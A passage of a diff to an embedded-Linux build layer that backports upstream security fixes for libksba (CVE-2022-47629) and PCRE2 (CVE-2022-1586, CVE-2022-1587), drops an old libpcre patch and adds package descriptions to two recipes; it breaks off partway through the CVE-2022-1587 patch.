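            printf("total: %zu\n", nhdr + len);
        return 0;
    }
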
diff --git a/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
new file mode 100644
index 0000000000..b09d0eb557
--- /dev/null
+++ b/meta/recipes-support/libksba/libksba/CVE-2022-47629.patch
@@ -0,0 +1,69 @@
+From b17444b3c47e32c77a3ba5335ae30ccbadcba3cf Mon Sep 17 00:00:00 2001
+From: Werner Koch <wk@gnupg.org>
+Date: Tue, 22 Nov 2022 16:36:46 +0100
+Subject: [PATCH] Fix an integer overflow in the CRL signature parser.
+
+* src/crl.c (parse_signature): N+N2 now checked for overflow.
+
+* src/ocsp.c (parse_response_extensions): Do not accept too large
+values.
+(parse_single_extensions): Ditto.
+--
+
+The second patch is an extra safeguard not related to the reported
+bug.
+
+GnuPG-bug-id: 6284
+Reported-by: Joseph Surin, elttam
+CVE: CVE-2022-47629
+https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libksba.git;a=commit;h=f61a5ea4e0f6a80fd4b28ef0174bee77793cf070
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/crl.c | 2 +-
+ src/ocsp.c | 12 ++++++++++++
+ 2 files changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/crl.c b/src/crl.c
+index 87a3fa3..9d3028e 100644
+--- a/src/crl.c
++++ b/src/crl.c
+@@ -1434,7 +1434,7 @@ parse_signature (ksba_crl_t crl)
+ && !ti.is_constructed) )
+ return gpg_error (GPG_ERR_INV_CRL_OBJ);
+ n2 = ti.nhdr + ti.length;
+- if (n + n2 >= DIM(tmpbuf))
++ if (n + n2 >= DIM(tmpbuf) || (n + n2) < n)
+ return gpg_error (GPG_ERR_TOO_LARGE);
+ memcpy (tmpbuf+n, ti.buf, ti.nhdr);
+ err = read_buffer (crl->reader, tmpbuf+n+ti.nhdr, ti.length);
+diff --git a/src/ocsp.c b/src/ocsp.c
+index 4b26f8d..c41234e 100644
+--- a/src/ocsp.c
++++ b/src/ocsp.c
+@@ -912,6 +912,12 @@ parse_response_extensions (ksba_ocsp_t ocsp,
+ else
+ ocsp->good_nonce = 1;
+ }
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
+@@ -979,6 +985,12 @@ parse_single_extensions (struct ocsp_reqitem_s *ri,
+ err = parse_octet_string (&data, &datalen, &ti);
+ if (err)
+ goto leave;
++ if (ti.length > (1<<24))
++ {
++ /* Bail out on much too large objects. */
++ err = gpg_error (GPG_ERR_BAD_BER);
++ goto leave;
++ }
+ ex = xtrymalloc (sizeof *ex + strlen (oid) + ti.length);
+ if (!ex)
+ {
diff --git a/meta/recipes-support/libksba/libksba_1.3.5.bb b/meta/recipes-support/libksba/libksba_1.3.5.bb
index 336d7f8177..5293aa91e1 100644
--- a/meta/recipes-support/libksba/libksba_1.3.5.bb
+++ b/meta/recipes-support/libksba/libksba_1.3.5.bb
@@ -1,4 +1,9 @@
SUMMARY = "Easy API to create and parse X.509 and CMS related objects"
+DESCRIPTION = "A library to make the tasks of working with X.509 certificates, \
+CMS data and related objects easier. It provides a high-level interface to \
+the implemented protocols and presents the data in a consistent way. The \
+library does not rely on another cryptographic library but provides \
+hooks for easy integration with Libgcrypt. "
HOMEPAGE = "http://www.gnupg.org/related_software/libksba/"
LICENSE = "GPLv3+ & (GPLv2+ | LGPLv3+)"
LICENSE_${PN} = "GPLv2+ | LGPLv3+"
@@ -17,7 +22,10 @@ inherit autotools binconfig-disabled pkgconfig texinfo
UPSTREAM_CHECK_URI = "https://gnupg.org/download/index.html"
SRC_URI = "${GNUPG_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
- file://ksba-add-pkgconfig-support.patch"
+ file://ksba-add-pkgconfig-support.patch \
+ file://CVE-2022-47629.patch \
+ file://CVE-2022-3515.patch \
+"
SRC_URI[md5sum] = "8302a3e263a7c630aa7dea7d341f07a2"
SRC_URI[sha256sum] = "41444fd7a6ff73a79ad9728f985e71c9ba8cd3e5e53358e70d5f066d35c1a340"
diff --git a/meta/recipes-support/libnl/libnl_3.5.0.bb b/meta/recipes-support/libnl/libnl_3.5.0.bb
index 9d0e1441a9..f4b5d40bb2 100644
--- a/meta/recipes-support/libnl/libnl_3.5.0.bb
+++ b/meta/recipes-support/libnl/libnl_3.5.0.bb
@@ -1,4 +1,9 @@
SUMMARY = "A library for applications dealing with netlink sockets"
+DESCRIPTION = "The libnl suite is a collection of libraries providing \
+APIs to netlink protocol based Linux kernel interfaces. libnl is the core \
+library implementing the fundamentals required to use the netlink protocol \
+such as socket handling, message construction and parsing, and sending \
+and receiving of data."
HOMEPAGE = "http://www.infradead.org/~tgr/libnl/"
SECTION = "libs/network"
diff --git a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch b/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
deleted file mode 100644
index 89b44f6aa6..0000000000
--- a/meta/recipes-support/libpcre/libpcre/fix-pcre-name-collision.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-Upstream-Status: Inappropriate [debian patch]
-
-This patch address a namespace collision with libc.
-
-Although there is no "#include <regex.h>" in the source file, at
-runtime, it's unintentionally linked to the libc version, the regcomp of
-libc is called instead the pcre one using pcre's data structure...
-that looks like a disaster.
-
-Can patch is from Debian (and Ubuntu 11.04alpha has it also).
-
-[sgw: added patch comment]
-Signed-off-by: Qing He <qing.he@intel.com>
-Signed-off-by: Saul Wold <sgw@linux.intel.com>
-
---- a/pcreposix.h 2010-05-17 00:17:23.000000000 +0800
-+++ b/pcreposix.h 2009-01-15 04:32:17.000000000 +0800
-@@ -133,14 +130,19 @@
-
- /* The functions */
-
--PCREPOSIX_EXP_DECL int regcomp(regex_t *, const char *, int);
--PCREPOSIX_EXP_DECL int regexec(const regex_t *, const char *, size_t,
-+PCREPOSIX_EXP_DECL int pcreposix_regcomp(regex_t *, const char *, int);
-+PCREPOSIX_EXP_DECL int pcreposix_regexec(const regex_t *, const char *, size_t,
- regmatch_t *, int);
--PCREPOSIX_EXP_DECL size_t regerror(int, const regex_t *, char *, size_t);
--PCREPOSIX_EXP_DECL void regfree(regex_t *);
-+PCREPOSIX_EXP_DECL size_t pcreposix_regerror(int, const regex_t *, char *, size_t);
-+PCREPOSIX_EXP_DECL void pcreposix_regfree(regex_t *);
-
- #ifdef __cplusplus
- } /* extern "C" */
- #endif
-
-+#define regcomp pcreposix_regcomp
-+#define regexec pcreposix_regexec
-+#define regerror pcreposix_regerror
-+#define regfree pcreposix_regfree
-+
- #endif /* End of pcreposix.h */
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
new file mode 100644
index 0000000000..42ee417fe7
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586-regression.patch
@@ -0,0 +1,30 @@
+From 5d1e62b0155292b994aa1c96d4ed8ce4346ef4c2 Mon Sep 17 00:00:00 2001
+From: Zoltan Herczeg <hzmester@freemail.hu>
+Date: Thu, 24 Mar 2022 05:34:42 +0000
+Subject: [PATCH] Fix incorrect value reading in JIT.
+
+CVE: CVE-2022-1586
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc3]
+
+(cherry picked from commit d4fa336fbcc388f89095b184ba6d99422cfc676c)
+Signed-off-by: Shinu Chandran <shinucha@cisco.com>
+---
+ src/pcre2_jit_compile.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 493c96d..fa57942 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7188,7 +7188,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST && *cc == XCL_PROP)
++ if (*cc == PT_CLIST && cc[-1] == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+--
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
new file mode 100644
index 0000000000..fbbbc9ca77
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
@@ -0,0 +1,59 @@
+From 233c4248550d0c1d9bfee42198d5ee0855b7d413 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 13:52:39 +0530
+Subject: [PATCH] CVE-2022-1586
+
+Upstream-Status: Backport from https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ ChangeLog | 3 +++
+ src/pcre2_jit_compile.c | 2 +-
+ src/pcre2_jit_test.c | 4 ++++
+ 3 files changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index 0926c29..b5d72dc 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -1,6 +1,9 @@
+ Change Log for PCRE2
+ --------------------
+
++23. Fixed a unicode property matching issue in JIT. The character was not
++fully read in caseless matching.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index f564127..5d43865 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -7119,7 +7119,7 @@ while (*cc != XCL_END)
+ {
+ SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
+ cc++;
+- if (*cc == PT_CLIST)
++ if (*cc == PT_CLIST && *cc == XCL_PROP)
+ {
+ other_cases = PRIV(ucd_caseless_sets) + cc[1];
+ while (*other_cases != NOTACHAR)
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index a9b3880..9df87fd 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -408,6 +408,10 @@ static struct regression_test_case regression_test_cases[] = {
+ { MUP, A, 0, 0 | F_PROPERTY, "[\xc3\xa2-\xc3\xa6\xc3\x81-\xc3\x84\xe2\x80\xa8-\xe2\x80\xa9\xe6\x92\xad\\p{Zs}]{2,}", "\xe2\x80\xa7\xe2\x80\xa9\xe6\x92\xad \xe6\x92\xae" },
+ { MUP, A, 0, 0 | F_PROPERTY, "[\\P{L&}]{2}[^\xc2\x85-\xc2\x89\\p{Ll}\\p{Lu}]{2}", "\xc3\xa9\xe6\x92\xad.a\xe6\x92\xad|\xc2\x8a#" },
+ { PCRE2_UCP, 0, 0, 0 | F_PROPERTY, "[a-b\\s]{2,5}[^a]", "AB baaa" },
++ { MUP, 0, 0, 0 | F_NOMATCH, "[^\\p{Hangul}\\p{Z}]", " " },
++ { MUP, 0, 0, 0, "[\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { MUP, 0, 0, 0, "[\\x{a92e}\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
++ { CMUP, 0, 0, 0, "[^S]\\B", "\xe2\x80\x8a" },
+
+ /* Possible empty brackets. */
+ { MU, A, 0, 0, "(?:|ab||bc|a)+d", "abcxabcabd" },
+--
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
new file mode 100644
index 0000000000..70f9f9f079
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
@@ -0,0 +1,660 @@
+From aa5aac0d209e3debf80fc2db924d9401fc50454b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 23 May 2022 14:11:11 +0530
+Subject: [PATCH] CVE-2022-1587
+
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0]
+CVE: CVE-2022-1587
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ ChangeLog | 3 +
+ src/pcre2_jit_compile.c | 290 ++++++++++++++++++++++++++--------------
+ src/pcre2_jit_test.c | 1 +
+ 3 files changed, 194 insertions(+), 100 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index b5d72dc..de82de9 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -4,6 +4,9 @@ Change Log for PCRE2
+ 23. Fixed a unicode property matching issue in JIT. The character was not
+ fully read in caseless matching.
+
++24. Fixed an issue affecting recursions in JIT caused by duplicated data
++transfers.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
+index 5d43865..493c96d 100644
+--- a/src/pcre2_jit_compile.c
++++ b/src/pcre2_jit_compile.c
+@@ -407,6 +407,9 @@ typedef struct compiler_common {
+ /* Locals used by fast fail optimization. */
+ sljit_s32 fast_fail_start_ptr;
+ sljit_s32 fast_fail_end_ptr;
++ /* Variables used by recursive call generator. */
++ sljit_s32 recurse_bitset_size;
++ uint8_t *recurse_bitset;
+
+ /* Flipped and lower case tables. */
+ const sljit_u8 *fcc;
+@@ -2109,19 +2112,39 @@ for (i = 0; i < RECURSE_TMP_REG_COUNT; i++)
+
+ #undef RECURSE_TMP_REG_COUNT
+
++static BOOL recurse_check_bit(compiler_common *common, sljit_sw bit_index)
++{
++uint8_t *byte;
++uint8_t mask;
++
++SLJIT_ASSERT((bit_index & (sizeof(sljit_sw) - 1)) == 0);
++
++bit_index >>= SLJIT_WORD_SHIFT;
++
++mask = 1 << (bit_index & 0x7);
++byte = common->recurse_bitset + (bit_index >> 3);
++
++if (*byte & mask)
++ return FALSE;
++
++*byte |= mask;
++return TRUE;
++}
++
+ static int get_recurse_data_length(compiler_common *common, PCRE2_SPTR cc, PCRE2_SPTR ccend,
+ BOOL *needs_control_head, BOOL *has_quit, BOOL *has_accept)
+ {
+ int length = 1;
+-int size;
++int size, offset;
+ PCRE2_SPTR alternative;
+ BOOL quit_found = FALSE;
+ BOOL accept_found = FALSE;
+ BOOL setsom_found = FALSE;
+ BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+ BOOL control_head_found = FALSE;
+
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
++
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ control_head_found = TRUE;
+@@ -2144,15 +2167,17 @@ while (cc < ccend)
+ setsom_found = TRUE;
+ if (common->mark_ptr != 0)
+ setmark_found = TRUE;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_KET:
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0)
+ {
+- length++;
++ if (recurse_check_bit(common, offset))
++ length++;
+ SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+ cc += PRIVATE_DATA(cc + 1);
+ }
+@@ -2169,39 +2194,55 @@ while (cc < ccend)
+ case OP_SBRA:
+ case OP_SBRAPOS:
+ case OP_SCOND:
+- length++;
+ SLJIT_ASSERT(PRIVATE_DATA(cc) != 0);
++ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_CBRA:
+ case OP_SCBRA:
+- length += 2;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
+- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++ offset = GET2(cc, 1 + LINK_SIZE);
++ if (recurse_check_bit(common, OVECTOR(offset << 1)))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++ length += 2;
++ }
++ if (common->optimized_cbracket[offset] == 0 && recurse_check_bit(common, OVECTOR_PRIV(offset)))
++ length++;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ length++;
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_CBRAPOS:
+ case OP_SCBRAPOS:
+- length += 2 + 2;
+- if (common->capture_last_ptr != 0)
+- capture_last_found = TRUE;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ if (recurse_check_bit(common, OVECTOR(offset << 1)))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
++ length += 2;
++ }
++ if (recurse_check_bit(common, OVECTOR_PRIV(offset)))
++ length++;
++ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
++ length++;
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
++ length++;
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_COND:
+ /* Might be a hidden SCOND. */
+ alternative = cc + GET(cc, 1);
+- if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
++ if ((*alternative == OP_KETRMAX || *alternative == OP_KETRMIN) && recurse_check_bit(common, PRIVATE_DATA(cc)))
+ length++;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length++;
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2210,8 +2251,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2219,8 +2264,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2228,20 +2277,29 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length++;
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc) != 0)
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
++ {
++ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
+ length += 2;
++ }
+ cc += 1 + IMM2_SIZE;
+ break;
+
+@@ -2253,7 +2311,9 @@ while (cc < ccend)
+ #else
+ size = 1 + 32 / (int)sizeof(PCRE2_UCHAR);
+ #endif
+- if (PRIVATE_DATA(cc) != 0)
++
++ offset = PRIVATE_DATA(cc);
++ if (offset != 0 && recurse_check_bit(common, offset))
+ length += get_class_iterator_size(cc + size);
+ cc += size;
+ break;
+@@ -2288,8 +2348,7 @@ while (cc < ccend)
+ case OP_THEN:
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+ quit_found = TRUE;
+- if (!control_head_found)
+- control_head_found = TRUE;
++ control_head_found = TRUE;
+ cc++;
+ break;
+
+@@ -2309,8 +2368,6 @@ SLJIT_ASSERT(cc == ccend);
+
+ if (control_head_found)
+ length++;
+-if (capture_last_found)
+- length++;
+ if (quit_found)
+ {
+ if (setsom_found)
+@@ -2343,14 +2400,12 @@ sljit_sw shared_srcw[3];
+ sljit_sw kept_shared_srcw[2];
+ int private_count, shared_count, kept_shared_count;
+ int from_sp, base_reg, offset, i;
+-BOOL setsom_found = FALSE;
+-BOOL setmark_found = FALSE;
+-BOOL capture_last_found = FALSE;
+-BOOL control_head_found = FALSE;
++
++memset(common->recurse_bitset, 0, common->recurse_bitset_size);
+
+ #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+-control_head_found = TRUE;
++recurse_check_bit(common, common->control_head_ptr);
+ #endif
+
+ switch (type)
+@@ -2438,11 +2493,10 @@ while (cc < ccend)
+ {
+ case OP_SET_SOM:
+ SLJIT_ASSERT(common->has_set_som);
+- if (has_quit && !setsom_found)
++ if (has_quit && recurse_check_bit(common, OVECTOR(0)))
+ {
+ kept_shared_srcw[0] = OVECTOR(0);
+ kept_shared_count = 1;
+- setsom_found = TRUE;
+ }
+ cc += 1;
+ break;
+@@ -2450,33 +2504,31 @@ while (cc < ccend)
+ case OP_RECURSE:
+ if (has_quit)
+ {
+- if (common->has_set_som && !setsom_found)
++ if (common->has_set_som && recurse_check_bit(common, OVECTOR(0)))
+ {
+ kept_shared_srcw[0] = OVECTOR(0);
+ kept_shared_count = 1;
+- setsom_found = TRUE;
+ }
+- if (common->mark_ptr != 0 && !setmark_found)
++ if (common->mark_ptr != 0 && recurse_check_bit(common, common->mark_ptr))
+ {
+ kept_shared_srcw[kept_shared_count] = common->mark_ptr;
+ kept_shared_count++;
+- setmark_found = TRUE;
+ }
+ }
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+ shared_srcw[0] = common->capture_last_ptr;
+ shared_count = 1;
+- capture_last_found = TRUE;
+ }
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_KET:
+- if (PRIVATE_DATA(cc) != 0)
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0)
+ {
+- private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
+ cc += PRIVATE_DATA(cc + 1);
+ }
+@@ -2493,50 +2545,66 @@ while (cc < ccend)
+ case OP_SBRA:
+ case OP_SBRAPOS:
+ case OP_SCOND:
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ cc += 1 + LINK_SIZE;
+ break;
+
+ case OP_CBRA:
+ case OP_SCBRA:
+- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+- shared_srcw[0] = OVECTOR(offset);
+- shared_srcw[1] = OVECTOR(offset + 1);
+- shared_count = 2;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ shared_srcw[0] = OVECTOR(offset << 1);
++ if (recurse_check_bit(common, shared_srcw[0]))
++ {
++ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++ shared_count = 2;
++ }
+
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+- shared_srcw[2] = common->capture_last_ptr;
+- shared_count = 3;
+- capture_last_found = TRUE;
++ shared_srcw[shared_count] = common->capture_last_ptr;
++ shared_count++;
+ }
+
+- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
++ if (common->optimized_cbracket[offset] == 0)
+ {
+- private_count = 1;
+- private_srcw[0] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++ private_srcw[0] = OVECTOR_PRIV(offset);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ }
++
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+ case OP_CBRAPOS:
+ case OP_SCBRAPOS:
+- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
+- shared_srcw[0] = OVECTOR(offset);
+- shared_srcw[1] = OVECTOR(offset + 1);
+- shared_count = 2;
++ offset = GET2(cc, 1 + LINK_SIZE);
++ shared_srcw[0] = OVECTOR(offset << 1);
++ if (recurse_check_bit(common, shared_srcw[0]))
++ {
++ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
++ shared_count = 2;
++ }
+
+- if (common->capture_last_ptr != 0 && !capture_last_found)
++ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
+ {
+- shared_srcw[2] = common->capture_last_ptr;
+- shared_count = 3;
+- capture_last_found = TRUE;
++ shared_srcw[shared_count] = common->capture_last_ptr;
++ shared_count++;
+ }
+
+- private_count = 2;
+ private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
++
++ offset = OVECTOR_PRIV(offset);
++ if (recurse_check_bit(common, offset))
++ {
++ private_srcw[private_count] = offset;
++ private_count++;
++ }
+ cc += 1 + LINK_SIZE + IMM2_SIZE;
+ break;
+
+@@ -2545,18 +2613,17 @@ while (cc < ccend)
+ alternative = cc + GET(cc, 1);
+ if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
+ {
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
++ if (recurse_check_bit(common, private_srcw[0]))
++ private_count = 1;
+ }
+ cc += 1 + LINK_SIZE;
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc))
+- {
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+ if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
+@@ -2564,11 +2631,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 2;
+ #ifdef SUPPORT_UNICODE
+@@ -2577,11 +2645,12 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+@@ -2590,30 +2659,30 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc))
+- {
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
